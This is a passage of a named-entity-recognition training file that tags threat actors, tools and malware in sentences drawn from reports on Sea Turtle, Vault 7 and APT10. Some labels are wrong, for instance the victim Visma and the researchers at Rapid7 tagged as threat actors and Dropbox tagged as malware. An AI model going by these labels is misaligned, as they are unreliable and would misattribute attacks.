{"THREAT_ACTOR: attackers": [[4, 13]], "TOOL: MitM": [[95, 99]]}, "info": {"id": "dnrti_train_002699", "source": "dnrti_train"}} {"text": "In some cases , the victims were redirected to these actor-controlled servers displaying the stolen certificate .", "spans": {"THREAT_ACTOR: actor-controlled": [[53, 69]], "TOOL: servers": [[70, 77]]}, "info": {"id": "dnrti_train_002700", "source": "dnrti_train"}} {"text": "One notable aspect of the campaign was the actors' ability to impersonate VPN applications , such as Cisco Adaptive Security Appliance (ASA) products , to perform MitM attacks .", "spans": {"THREAT_ACTOR: actors'": [[43, 50]], "TOOL: VPN applications": [[74, 90]], "TOOL: Adaptive Security Appliance": [[107, 134]]}, "info": {"id": "dnrti_train_002701", "source": "dnrti_train"}} {"text": "At this time , we do not believe that the attackers found a new ASA exploit .", "spans": {"ORGANIZATION: we": [[15, 17]], "THREAT_ACTOR: attackers": [[42, 51]], "VULNERABILITY: ASA": [[64, 67]], "VULNERABILITY: exploit": [[68, 75]]}, "info": {"id": "dnrti_train_002702", "source": "dnrti_train"}} {"text": "Rather , they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network .", "spans": {"THREAT_ACTOR: they": [[9, 13]], "TOOL: ASA's": [[71, 76]]}, "info": {"id": "dnrti_train_002703", "source": "dnrti_train"}} {"text": "As an example , DNS records indicate that a targeted domain resolved to an actor-controlled MitM server .", "spans": {"THREAT_ACTOR: actor-controlled": [[75, 91]], "TOOL: MitM server": [[92, 103]]}, "info": {"id": "dnrti_train_002704", "source": "dnrti_train"}} {"text": "In another case , the attackers were able to compromise NetNod , a non-profit , independent internet infrastructure organization based in Sweden .", "spans": {"THREAT_ACTOR: attackers": [[22, 31]]}, "info": {"id": "dnrti_train_002705", "source": "dnrti_train"}} {"text": "Using this access , the threat 
actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net .", "spans": {"THREAT_ACTOR: actors": [[31, 37]]}, "info": {"id": "dnrti_train_002706", "source": "dnrti_train"}} {"text": "This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa) .", "spans": {"THREAT_ACTOR: attackers": [[29, 38]]}, "info": {"id": "dnrti_train_002707", "source": "dnrti_train"}} {"text": "In one of the more recent campaigns on March 27 , 2019 , the threat actors targeted the Sweden-based consulting firm Cafax .", "spans": {"THREAT_ACTOR: threat actors": [[61, 74]], "ORGANIZATION: Cafax": [[117, 122]]}, "info": {"id": "dnrti_train_002708", "source": "dnrti_train"}} {"text": "We assess with high confidence that Sea Turtle was targeted in an attempt to re-establish access to the NetNod network , which was previously compromised by this threat actor .", "spans": {"ORGANIZATION: NetNod": [[104, 110]], "THREAT_ACTOR: threat actor": [[162, 174]]}, "info": {"id": "dnrti_train_002709", "source": "dnrti_train"}} {"text": "Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs .", "spans": {"THREAT_ACTOR: attackers": [[61, 70]]}, "info": {"id": "dnrti_train_002710", "source": "dnrti_train"}} {"text": "These actors perform DNS hijacking through the use of actor-controlled name servers .", "spans": {"THREAT_ACTOR: actors": [[6, 12]], "TOOL: name servers": [[71, 83]]}, "info": {"id": "dnrti_train_002711", "source": "dnrti_train"}} {"text": "Sea Turtle have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs .", "spans": {"THREAT_ACTOR: Sea Turtle": [[0, 10]]}, "info": {"id": "dnrti_train_002712", "source": "dnrti_train"}} {"text": "These actors use Let's Encrypts , Comodo , Sectigo , and self-signed certificates in their MitM servers to gain the initial round of credentials .", 
"spans": {"THREAT_ACTOR: actors": [[6, 12]], "TOOL: Encrypts": [[23, 31]], "TOOL: Comodo": [[34, 40]], "TOOL: Sectigo": [[43, 50]], "TOOL: self-signed certificates": [[57, 81]], "TOOL: MitM servers": [[91, 103]]}, "info": {"id": "dnrti_train_002713", "source": "dnrti_train"}} {"text": "These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs .", "spans": {"THREAT_ACTOR: actors": [[6, 12]], "ORGANIZATION: manage": [[131, 137]], "ORGANIZATION: ccTLDs": [[138, 144]]}, "info": {"id": "dnrti_train_002714", "source": "dnrti_train"}} {"text": "Once they have access to the network , they steal the organization's legitimate SSL certificate and use it on actor-controlled servers .", "spans": {"THREAT_ACTOR: they": [[39, 43]], "TOOL: actor-controlled": [[110, 126]], "TOOL: servers": [[127, 134]]}, "info": {"id": "dnrti_train_002715", "source": "dnrti_train"}} {"text": "We believe that the Sea Turtle campaign continues to be highly successful for several reasons .", "spans": {"ORGANIZATION: We": [[0, 2]]}, "info": {"id": "dnrti_train_002716", "source": "dnrti_train"}} {"text": "Had more ccTLDs implemented security features such as registrar locks , attackers would be unable to redirect the targeted domains .", "spans": {"THREAT_ACTOR: attackers": [[72, 81]]}, "info": {"id": "dnrti_train_002717", "source": "dnrti_train"}} {"text": "The threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials .", "spans": {"THREAT_ACTOR: threat actors": [[4, 17]]}, "info": {"id": "dnrti_train_002719", "source": "dnrti_train"}} {"text": "Cisco Talos will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed .", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]]}, "info": {"id": "dnrti_train_002720", "source": 
"dnrti_train"}} {"text": "Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart .", "spans": {"MALWARE: link file": [[9, 18]], "MALWARE: AutoHotkeyU32.exe": [[45, 62]]}, "info": {"id": "dnrti_train_002722", "source": "dnrti_train"}} {"text": "Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources .", "spans": {"MALWARE: attacks": [[5, 12]]}, "info": {"id": "dnrti_train_002724", "source": "dnrti_train"}} {"text": "By the end of 2016 , the CIA's hacking division , which formally falls under the agency's Center for Cyber Intelligence (CCI) , had over 5000 registered users and had produced more than a thousand hacking systems , trojans , viruses , and other weaponized malware .", "spans": {"THREAT_ACTOR: CIA's hacking division": [[25, 47]], "TOOL: hacking systems": [[197, 212]], "TOOL: trojans": [[215, 222]], "TOOL: viruses": [[225, 232]], "TOOL: weaponized malware": [[245, 263]]}, "info": {"id": "dnrti_train_002726", "source": "dnrti_train"}} {"text": "Such is the scale of the CIA's undertaking that by 2016 , its hackers had utilized more code than that used to run Facebook .", "spans": {"THREAT_ACTOR: hackers": [[62, 69]]}, "info": {"id": "dnrti_train_002727", "source": "dnrti_train"}} {"text": "Wikileaks has carefully reviewed the Year Zero disclosure and published substantive CIA documentation while avoiding the distribution of 'armed' cyberweapons until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed , disarmed and published .", "spans": {"ORGANIZATION: Wikileaks": [[0, 9]], "THREAT_ACTOR: CIA": [[84, 87]]}, "info": {"id": "dnrti_train_002728", "source": "dnrti_train"}} {"text": "These redactions include ten of thousands of CIA targets and attack machines throughout Latin America , Europe and the United States .", "spans": {"THREAT_ACTOR: 
CIA": [[45, 48]]}, "info": {"id": "dnrti_train_002729", "source": "dnrti_train"}} {"text": "The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell's 1984 , but Weeping Angel , developed by the CIA's Embedded Devices Branch (EDB) , which infests smart TVs , transforming them into covert microphones , is surely its most emblematic realization .", "spans": {"TOOL: Weeping Angel": [[111, 124]], "THREAT_ACTOR: CIA's": [[144, 149]], "TOOL: smart TVs": [[196, 205]]}, "info": {"id": "dnrti_train_002730", "source": "dnrti_train"}} {"text": "As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks .", "spans": {"THREAT_ACTOR: CIA": [[23, 26]]}, "info": {"id": "dnrti_train_002732", "source": "dnrti_train"}} {"text": "Despite iPhone's minority share (14.5%) of the global smart phone market in 2016 , a specialized unit in the CIA's Mobile Development Branch produces malware to infest , control and exfiltrate data from iPhones and other Apple products running iOS , such as iPads .", "spans": {"THREAT_ACTOR: CIA's": [[109, 114]], "TOOL: iPhones": [[203, 210]], "TOOL: Apple": [[221, 226]], "TOOL: iOS": [[244, 247]], "TOOL: iPads": [[258, 263]]}, "info": {"id": "dnrti_train_002734", "source": "dnrti_train"}} {"text": "The attack against Samsung smart TVs was developed in cooperation with the United Kingdom's MI5/BTSS .", "spans": {"ORGANIZATION: Samsung smart TVs": [[19, 36]], "THREAT_ACTOR: MI5/BTSS": [[92, 100]]}, "info": {"id": "dnrti_train_002735", "source": "dnrti_train"}} {"text": "CIA's arsenal includes numerous local and remote zero days developed by CIA or obtained from GCHQ , NSA , FBI or purchased from cyber arms contractors such as Baitshop .", "spans": {"THREAT_ACTOR: CIA's": [[0, 5]], "TOOL: GCHQ": [[93, 97]], "TOOL: NSA": [[100, 103]], "TOOL: cyber arms contractors": [[128, 150]]}, "info": {"id": "dnrti_train_002736", "source": "dnrti_train"}} {"text": "CIA's malware 
includes multiple local and remote weaponized zero days , air gap jumping viruses such as Hammer Drill which infects software distributed on CD/DVDs , infectors for removable media such as USBs , systems to hide data in images or in covert disk areas Brutal Kangaroo and to keep its malware infestations going .", "spans": {"THREAT_ACTOR: CIA's": [[0, 5]], "TOOL: Hammer Drill": [[104, 116]], "TOOL: Brutal Kangaroo": [[265, 280]]}, "info": {"id": "dnrti_train_002739", "source": "dnrti_train"}} {"text": "Many of these infection efforts are pulled together by the CIA's Automated Implant Branch (AIB) , which has developed several attack systems for automated infestation and control of CIA malware , such as Assassin and Medusa .", "spans": {"THREAT_ACTOR: CIA's": [[59, 64]], "TOOL: Assassin": [[204, 212]], "TOOL: Medusa": [[217, 223]]}, "info": {"id": "dnrti_train_002740", "source": "dnrti_train"}} {"text": "The CIA has developed automated multi-platform malware attack and control systems covering Windows , Mac OS X , Solaris , Linux and more , such as EDB's HIVE and the related Cutthroat and Swindle tools , which are described in the examples section below .", "spans": {"THREAT_ACTOR: CIA": [[4, 7]], "TOOL: Windows": [[91, 98]], "TOOL: Mac OS X": [[101, 109]], "TOOL: Solaris": [[112, 119]], "TOOL: Linux": [[122, 127]], "TOOL: HIVE": [[153, 157]], "TOOL: Cutthroat": [[174, 183]], "TOOL: Swindle": [[188, 195]]}, "info": {"id": "dnrti_train_002741", "source": "dnrti_train"}} {"text": "By hiding these security flaws from manufacturers like Apple and Google the CIA ensures that it can hack everyone &mdsh; at the expense of leaving everyone hackable .", "spans": {"ORGANIZATION: Apple": [[55, 60]], "ORGANIZATION: Google": [[65, 71]], "THREAT_ACTOR: CIA": [[76, 79]]}, "info": {"id": "dnrti_train_002742", "source": "dnrti_train"}} {"text": "Once in Frankfurt CIA hackers can travel without further border checks to the 25 European countries that are part of the Shengen open border 
area — including France , Italy and Switzerland .", "spans": {"THREAT_ACTOR: CIA": [[18, 21]]}, "info": {"id": "dnrti_train_002743", "source": "dnrti_train"}} {"text": "A number of the CIA's electronic attack methods are designed for physical proximity .", "spans": {"THREAT_ACTOR: CIA's": [[16, 21]]}, "info": {"id": "dnrti_train_002744", "source": "dnrti_train"}} {"text": "The attacker is provided with a USB containing malware developed for the CIA for this purpose , which is inserted into the targeted computer .", "spans": {"THREAT_ACTOR: attacker": [[4, 12]], "TOOL: USB containing malware": [[32, 54]]}, "info": {"id": "dnrti_train_002745", "source": "dnrti_train"}} {"text": "The attacker then infects and exfiltrates data to removable media .", "spans": {"THREAT_ACTOR: attacker": [[4, 12]]}, "info": {"id": "dnrti_train_002746", "source": "dnrti_train"}} {"text": "For example , the CIA attack system Fine Dining , provides 24 decoy applications for CIA spies to use .", "spans": {}, "info": {"id": "dnrti_train_002748", "source": "dnrti_train"}} {"text": "For example , Comodo was defeated by CIA malware placing itself in the Window's Recycle Bin .", "spans": {"ORGANIZATION: Comodo": [[14, 20]], "THREAT_ACTOR: CIA": [[37, 40]]}, "info": {"id": "dnrti_train_002749", "source": "dnrti_train"}} {"text": "CIA hackers discussed what the NSA's Equation Group hackers did wrong and how the CIA's malware makers could avoid similar exposure .", "spans": {"ORGANIZATION: CIA": [[0, 3]], "THREAT_ACTOR: Equation Group": [[37, 51]]}, "info": {"id": "dnrti_train_002750", "source": "dnrti_train"}} {"text": "The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation .", "spans": {"THREAT_ACTOR: CIA's": [[4, 9]], "THREAT_ACTOR: UMBRAGE": [[34, 41]]}, "info": {"id": "dnrti_train_002751", "source": "dnrti_train"}} {"text": "This information is used by the 
CIA's 'JQJIMPROVISE' software (see below) to configure a set of CIA malware suited to the specific needs of an operation .", "spans": {"THREAT_ACTOR: CIA's": [[32, 37]], "TOOL: 'JQJIMPROVISE'": [[38, 52]]}, "info": {"id": "dnrti_train_002752", "source": "dnrti_train"}} {"text": "HIVE is a multi-platform CIA malware suite and its associated control software .", "spans": {"TOOL: HIVE": [[0, 4]], "THREAT_ACTOR: CIA": [[25, 28]]}, "info": {"id": "dnrti_train_002754", "source": "dnrti_train"}} {"text": "A series of standards lay out CIA malware infestation patterns which are likely to assist forensic crime scene investigators as well as Apple , Microsoft , Google , Samsung , Nokia , Blackberry , Siemens and anti-virus companies attribute and defend against attacks .", "spans": {"THREAT_ACTOR: CIA": [[30, 33]], "ORGANIZATION: Apple": [[136, 141]], "ORGANIZATION: Microsoft": [[144, 153]], "ORGANIZATION: Google": [[156, 162]], "ORGANIZATION: Samsung": [[165, 172]], "ORGANIZATION: Nokia": [[175, 180]], "ORGANIZATION: Blackberry": [[183, 193]], "ORGANIZATION: Siemens": [[196, 203]], "ORGANIZATION: anti-virus companies": [[208, 228]]}, "info": {"id": "dnrti_train_002755", "source": "dnrti_train"}} {"text": "In April 2013 , Kaspersky Lab reported that a popular game was altered to include a backdoor in 2011 .", "spans": {"ORGANIZATION: Kaspersky": [[16, 25]]}, "info": {"id": "dnrti_train_002756", "source": "dnrti_train"}} {"text": "Yet again , new supply-chain attacks recently caught the attention of ESET Researchers .", "spans": {"ORGANIZATION: ESET": [[70, 74]]}, "info": {"id": "dnrti_train_002757", "source": "dnrti_train"}} {"text": "Given that these attacks were mostly targeted against Asia and the gaming industry , it shouldn’t be surprising they are the work of the group described in Kaspersky’s Winnti – More than just a game” .", "spans": {"ORGANIZATION: Kaspersky’s": [[156, 167]], "THREAT_ACTOR: Winnti": [[168, 174]]}, "info": {"id": "dnrti_train_002758", "source": 
"dnrti_train"}} {"text": "The OSB functions as the interface between CIA operational staff and the relevant technical support staff .", "spans": {"TOOL: OSB": [[4, 7]], "THREAT_ACTOR: CIA": [[43, 46]]}, "info": {"id": "dnrti_train_002759", "source": "dnrti_train"}} {"text": "A sustained cyberespionage campaign targeting at least three companies in the United States and Europe was uncovered by Recorded Future and Rapid7 between November 2017 and September 2018 .", "spans": {"ORGANIZATION: Recorded Future": [[120, 135]], "ORGANIZATION: Rapid7": [[140, 146]]}, "info": {"id": "dnrti_train_002760", "source": "dnrti_train"}} {"text": "The Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant .", "spans": {"MALWARE: Honeycomb": [[4, 13]]}, "info": {"id": "dnrti_train_002761", "source": "dnrti_train"}} {"text": "The attackers then enumerated access and conducted privilege escalation on the victim networks , utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware .", "spans": {"THREAT_ACTOR: APT10": [[167, 172]]}, "info": {"id": "dnrti_train_002762", "source": "dnrti_train"}} {"text": "On the two other victim networks , the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor , known to have only been used by APT10 .", "spans": {"TOOL: UPPERCUT": [[82, 90]], "THREAT_ACTOR: APT10": [[141, 146]]}, "info": {"id": "dnrti_train_002763", "source": "dnrti_train"}} {"text": "APT10 actors then compressed proprietary data from Visma using WinRAR (deployed by the attackers) and exfiltrated to a Dropbox account using the cURL for Windows command-line tool .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: WinRAR": [[63, 69]], "TOOL: cURL": [[145, 149]]}, "info": {"id": "dnrti_train_002764", "source": "dnrti_train"}} {"text": "On top of the breadth , volume , 
and targets of attacks that APT10 has conducted since at least 2016 , we now know that these operations are being run by the Chinese intelligence agency , the Ministry of State Security (MSS) .", "spans": {"THREAT_ACTOR: APT10": [[61, 66]]}, "info": {"id": "dnrti_train_002767", "source": "dnrti_train"}} {"text": "The backdoor was deployed using the Notepad++ updater and sideloading malicious DLL , as noted in APT10’s targeting of Japanese corporations in July 2018 .", "spans": {"THREAT_ACTOR: APT10’s": [[98, 105]]}, "info": {"id": "dnrti_train_002771", "source": "dnrti_train"}} {"text": "That attack was attributed to perpetrators Kaspersky called the Winnti Group .", "spans": {"ORGANIZATION: Kaspersky": [[43, 52]], "THREAT_ACTOR: Winnti Group": [[64, 76]]}, "info": {"id": "dnrti_train_002772", "source": "dnrti_train"}} {"text": "APT10 is a threat actor that has been active since at least 2009 .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]]}, "info": {"id": "dnrti_train_002773", "source": "dnrti_train"}} {"text": "APT10 has historically targeted healthcare , defense , aerospace , government , heavy industry and mining , and MSPs and IT services , as well as other sectors , for probable intellectual property theft .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]]}, "info": {"id": "dnrti_train_002774", "source": "dnrti_train"}} {"text": "We believe APT10 is the most significant Chinese state-sponsored cyber threat to global corporations known to date .", "spans": {"THREAT_ACTOR: APT10": [[11, 16]]}, "info": {"id": "dnrti_train_002775", "source": "dnrti_train"}} {"text": "In the blog , Intrusion Truth identified APT10 as having utilized several Tianjin-based companies , including Huaying Haitai Science and Technology Development Co Ltd and Laoying Baichen Instruments Equipment Co Ltd .", "spans": {"THREAT_ACTOR: APT10": [[41, 46]]}, "info": {"id": "dnrti_train_002776", "source": "dnrti_train"}} {"text": "Based on the technical data uncovered , and in light of recent 
disclosures by the U.S. Department of Justice on the ongoing activities of Chinese state-sponsored threat actors .", "spans": {"THREAT_ACTOR: Chinese state-sponsored": [[138, 161]]}, "info": {"id": "dnrti_train_002777", "source": "dnrti_train"}} {"text": "Our research from 2017 concluded that Guangdong ITSEC (and therefore the MSS) directed the activities of a company named Boyusec , which was identified as a shell company for APT3 .", "spans": {"THREAT_ACTOR: Guangdong ITSEC": [[38, 53]], "ORGANIZATION: Boyusec": [[121, 128]], "THREAT_ACTOR: APT3": [[175, 179]]}, "info": {"id": "dnrti_train_002778", "source": "dnrti_train"}} {"text": "The December APT10 indictment noted that the group’s malicious activities breached at least 45 companies and managed service providers in 12 countries , including Brazil , Canada , Finland , France , Germany , India , Japan , Sweden , Switzerland , the United Arab Emirates , the United Kingdom , and the United States .", "spans": {"THREAT_ACTOR: APT10": [[13, 18]]}, "info": {"id": "dnrti_train_002780", "source": "dnrti_train"}} {"text": "In all three incidents , APT10 gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials .", "spans": {"THREAT_ACTOR: APT10": [[25, 30]], "TOOL: Citrix": [[80, 86]], "TOOL: LogMeIn": [[91, 98]]}, "info": {"id": "dnrti_train_002781", "source": "dnrti_train"}} {"text": "In all three incidents , APT10 actors used previously acquired legitimate credentials , possibly gained via a third-party supply chain compromise in order to gain initial access to the law firm and the apparel company .", "spans": {"THREAT_ACTOR: APT10": [[25, 30]]}, "info": {"id": "dnrti_train_002783", "source": "dnrti_train"}} {"text": "During this operation (dubbed ‘Cloud Hopper” because of the group’s use of popular western cloud-based services) , APT10 utilized both new malware (Quasar RAT , Trochilus , RedLeaves , ChChes as well as some familiar old tools .", 
"spans": {"THREAT_ACTOR: APT10": [[115, 120]], "TOOL: (Quasar RAT": [[147, 158]], "TOOL: Trochilus": [[161, 170]], "TOOL: RedLeaves": [[173, 182]], "TOOL: ChChes": [[185, 191]]}, "info": {"id": "dnrti_train_002786", "source": "dnrti_train"}} {"text": "Most recently , on December 20 , 2018 , the U.S. Department of Justice charged two hackers associated with the Chinese Ministry of State Security (MSS) with global computer intrusion campaigns targeting intellectual property .", "spans": {"ORGANIZATION: U.S. Department": [[44, 59]], "THREAT_ACTOR: hackers": [[83, 90]]}, "info": {"id": "dnrti_train_002787", "source": "dnrti_train"}} {"text": "This indictment attributed the intrusions to APT10 , a group that had been conducting the malicious activities for over a decade on behalf of the MSS , China’s civilian human intelligence agency .", "spans": {"THREAT_ACTOR: APT10": [[45, 50]]}, "info": {"id": "dnrti_train_002788", "source": "dnrti_train"}} {"text": "The Visma group operates across the entire Nordic region along with Benelux , Central , and Eastern Europe .", "spans": {"THREAT_ACTOR: Visma": [[4, 9]]}, "info": {"id": "dnrti_train_002789", "source": "dnrti_train"}} {"text": "Recorded Future has actively tracked APT10 for several years , focusing specifically on the group’s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 .", "spans": {"ORGANIZATION: Recorded Future": [[0, 15]], "THREAT_ACTOR: APT10": [[37, 42]]}, "info": {"id": "dnrti_train_002790", "source": "dnrti_train"}} {"text": "We were particularly interested in identifying whether any customers of the targeted MSPs were subsequently compromised by APT10 , given their potential access through compromised MSP networks .", "spans": {"THREAT_ACTOR: APT10": [[123, 128]], "ORGANIZATION: MSP": [[180, 183]]}, "info": {"id": "dnrti_train_002791", "source": "dnrti_train"}} {"text": "Recorded Future’s Insikt Group has actively tracked APT10 for several years 
, focusing specifically on the group’s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 .", "spans": {"ORGANIZATION: Recorded Future’s": [[0, 17]]}, "info": {"id": "dnrti_train_002792", "source": "dnrti_train"}} {"text": "In September 2018 , one of our clients (and a supplier as well) , Visma , reached out to us for assistance in investigating an incident uncovered on their network following a breach notification by Rapid7 .", "spans": {"THREAT_ACTOR: Rapid7": [[198, 204]]}, "info": {"id": "dnrti_train_002793", "source": "dnrti_train"}} {"text": "On August 30 , 2018 , APT10 deployed their first modified version of Trochilus that had its C2 communications encrypted using Salsa20 and RC4 ciphers instead of the more common RC4-encrypted Trochilus variant seen in the wild .", "spans": {"THREAT_ACTOR: APT10": [[22, 27]], "TOOL: Trochilus": [[69, 78]]}, "info": {"id": "dnrti_train_002795", "source": "dnrti_train"}} {"text": "APT10 also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: WinRAR": [[16, 22]], "TOOL: cURL": [[27, 31]]}, "info": {"id": "dnrti_train_002798", "source": "dnrti_train"}} {"text": "In order to exfiltrate the compromised data , APT10 employed custom malware that used Dropbox as its C2 .", "spans": {"THREAT_ACTOR: APT10": [[46, 51]], "TOOL: Dropbox": [[86, 93]]}, "info": {"id": "dnrti_train_002799", "source": "dnrti_train"}} {"text": "Our research partner Rapid7 investigated the Dropbox use and found that the attackers had used the same account to store exfiltrated data from a global apparel company .", "spans": {"ORGANIZATION: Rapid7": [[21, 27]], "TOOL: Dropbox": [[45, 52]], "THREAT_ACTOR: attackers": [[76, 85]]}, "info": {"id": "dnrti_train_002801", "source": "dnrti_train"}} {"text": "They also identified broadly similar TTPs being used in the 
attack against a U.S law firm specializing in intellectual property law .", "spans": {"ORGANIZATION: They": [[0, 4]]}, "info": {"id": "dnrti_train_002802", "source": "dnrti_train"}} {"text": "Rapid7’s investigation revealed the law firm was first targeted in late 2017 , followed by the apparel company a few months later , and finally , the Visma attack in August 2018 .", "spans": {"ORGANIZATION: Rapid7’s": [[0, 8]], "ORGANIZATION: law firm": [[36, 44]]}, "info": {"id": "dnrti_train_002803", "source": "dnrti_train"}} {"text": "In one of the attacks , Rapid7 identified the attackers escaping a Citrix application in order to run the payload script on the victim desktop .", "spans": {"ORGANIZATION: Rapid7": [[24, 30]], "THREAT_ACTOR: attackers": [[46, 55]], "TOOL: Citrix": [[67, 73]]}, "info": {"id": "dnrti_train_002804", "source": "dnrti_train"}} {"text": "Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe .", "spans": {"TOOL: Visma": [[66, 71]], "THREAT_ACTOR: APT10": [[128, 133]], "TOOL: 1.bat": [[169, 174]], "TOOL: cu.exe": [[177, 183]], "TOOL: ss.rar": [[186, 192]], "TOOL: r.exe": [[195, 200]], "TOOL: pd.exe": [[203, 209]]}, "info": {"id": "dnrti_train_002805", "source": "dnrti_train"}} {"text": "Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL .", "spans": {"ORGANIZATION: Rapid7": [[21, 27]], "MALWARE: gup.exe": [[70, 77]], "MALWARE: ANEL": [[215, 219]]}, "info": {"id": "dnrti_train_002806", "source": "dnrti_train"}} {"text": "APT10 used this approach to deploy UPPERCUT when targeting Japanese corporations in July 2018 .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: UPPERCUT": [[35, 43]]}, "info": {"id": "dnrti_train_002807", 
"source": "dnrti_train"}} {"text": "APT10 actors gained initial access to the Visma network around August 17 , 2018 .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: Visma network": [[42, 55]]}, "info": {"id": "dnrti_train_002808", "source": "dnrti_train"}} {"text": "While we are confident that APT10 actors gained access to the Visma network in August using stolen employee Citrix remote desktop credentials , it is not clear how or when these credentials were initially compromised .", "spans": {"THREAT_ACTOR: APT10": [[28, 33]], "ORGANIZATION: Visma": [[62, 67]], "TOOL: Citrix remote desktop": [[108, 129]]}, "info": {"id": "dnrti_train_002809", "source": "dnrti_train"}} {"text": "After almost two weeks , on August 30 , 2018 , APT10 attackers used their access to the network to move laterally and made their first deployment of an RC4- and Salsa20-encrypted variant of the Trochilus malware using a previously associated DLL sideloading techniquE .", "spans": {"THREAT_ACTOR: APT10": [[47, 52]], "TOOL: Trochilus": [[194, 203]]}, "info": {"id": "dnrti_train_002811", "source": "dnrti_train"}} {"text": "This means that APT10 actors had two separate access points into the Visma network .", "spans": {"THREAT_ACTOR: APT10": [[16, 21]], "TOOL: Visma network": [[69, 82]]}, "info": {"id": "dnrti_train_002812", "source": "dnrti_train"}} {"text": "This slight delay may point to the handing over of active exploitation duties to other operator(s) in a multi-team APT10 effort within the Ministry of State Security for the attack .", "spans": {"THREAT_ACTOR: APT10": [[115, 120]]}, "info": {"id": "dnrti_train_002813", "source": "dnrti_train"}} {"text": "Other examples of malicious infrastructure registered with internet.bs include domains for APT28’s VPNFilter malware campaign and the registration of the cyber-berkut .", "spans": {"THREAT_ACTOR: APT28’s": [[91, 98]], "TOOL: VPNFilter": [[99, 108]], "TOOL: cyber-berkut": [[154, 166]]}, "info": {"id": "dnrti_train_002814", "source": 
"dnrti_train"}} {"text": "org domain that was affiliated with the pro-Russian and potentially Russian state-linked threat actor CyberBerkut .", "spans": {"THREAT_ACTOR: CyberBerkut": [[102, 113]]}, "info": {"id": "dnrti_train_002815", "source": "dnrti_train"}} {"text": "KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK .", "spans": {"MALWARE: KHRAT": [[0, 5]], "TOOL: backdoor trojan": [[11, 26]], "THREAT_ACTOR: DragonOK": [[91, 99]]}, "info": {"id": "dnrti_train_002816", "source": "dnrti_train"}} {"text": "In early 2018 , Rapid7 identified that APT10 compromised an apparel company , based upon detections and intelligence gathered from the U.S.-based law firm breach .", "spans": {"ORGANIZATION: Rapid7": [[16, 22]], "THREAT_ACTOR: APT10": [[39, 44]]}, "info": {"id": "dnrti_train_002817", "source": "dnrti_train"}} {"text": "Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe.” The attackers used identical TTPs for executing malware and Mimikatz as observed before , by using DLL sideloading with known good binaries that had DLL search order path issues .", "spans": {"ORGANIZATION: Rapid7": [[0, 6]], "THREAT_ACTOR: APT10": [[22, 27]], "TOOL: Mimikatz": [[127, 135]]}, "info": {"id": "dnrti_train_002819", "source": "dnrti_train"}} {"text": "Rapid7 reviewed malware discovered in the victim’s environment and found implants that used Dropbox as the C2 .", "spans": {"ORGANIZATION: Rapid7": [[0, 6]], "MALWARE: Dropbox": [[92, 99]]}, "info": {"id": "dnrti_train_002820", "source": "dnrti_train"}} {"text": "APT10 used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]]}, "info": {"id": "dnrti_train_002822", "source": "dnrti_train"}} {"text": "For exfiltration of stolen data , APT10 used WinRAR and renamed rar.exe” to r.exe” to create 
archives , upload them with curl.exe” (renamed to c.exe”) , and again , use the cloud storage provider Dropbox .", "spans": {"THREAT_ACTOR: APT10": [[34, 39]], "TOOL: WinRAR": [[45, 51]], "TOOL: rar.exe”": [[64, 72]], "TOOL: r.exe”": [[76, 82]], "TOOL: Dropbox": [[196, 203]]}, "info": {"id": "dnrti_train_002823", "source": "dnrti_train"}} {"text": "Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the attacker during the compromise and was able to attribute data that was placed into it as being owned by Visma .", "spans": {"ORGANIZATION: Rapid7": [[0, 6]], "THREAT_ACTOR: attacker": [[97, 105]]}, "info": {"id": "dnrti_train_002824", "source": "dnrti_train"}} {"text": "Once on the Visma network , APT10 attackers used the Microsoft BITSAdmin CLI tool to copy malicious tools from a suspected attacker-controlled C2 hosted on 173.254.236[.]158 to the \\ProgramData\\temp\\ directory on the infected host .", "spans": {"TOOL: Visma network": [[12, 25]], "THREAT_ACTOR: APT10": [[28, 33]], "TOOL: BITSAdmin": [[63, 72]]}, "info": {"id": "dnrti_train_002825", "source": "dnrti_train"}} {"text": "Rapid7 then provided a breach notification to Visma to alert them to this compromise in September 2018 .", "spans": 